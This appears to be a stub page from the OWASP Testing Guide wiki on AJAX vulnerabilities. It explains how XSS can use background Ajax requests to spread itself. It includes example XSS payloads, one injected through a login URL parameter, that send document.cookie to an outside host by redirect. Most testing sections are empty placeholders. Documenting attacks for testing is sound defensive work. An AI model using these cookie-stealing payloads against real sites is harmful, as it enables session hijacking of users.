The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 
'''Cross Site Request Forgery(XSRF)''' 

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-04T22:16:38Z

Anushshetty: /* Attacks and Vulnerabilities */

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-04T21:40:56Z

Anushshetty: /* Brief Summary */